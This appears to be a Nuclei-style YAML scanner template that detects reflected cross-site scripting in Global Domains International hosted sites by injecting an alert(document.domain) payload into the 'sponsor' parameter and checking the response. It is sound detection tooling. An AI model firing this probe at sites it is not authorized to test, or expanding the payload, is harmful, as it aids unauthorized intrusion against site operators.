40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
id: global-domains-xss
|
|
|
|
info:
|
|
name: Global Domains International - Cross-Site Scripting
|
|
author: princechaddha
|
|
severity: high
|
|
description: |
|
|
Sites hosted by Global Domains International, Inc. have cross-site scripting and directory traversal vulnerabilities.
|
|
reference:
|
|
- https://cxsecurity.com/issue/WLB-2018020247
|
|
- https://packetstormsecurity.com/files/126545/Global-Domains-International-Cross-Site-Scripting-Traversal.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
tags: globaldomains,xss,packetstorm
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by cs on 2022/09/09
|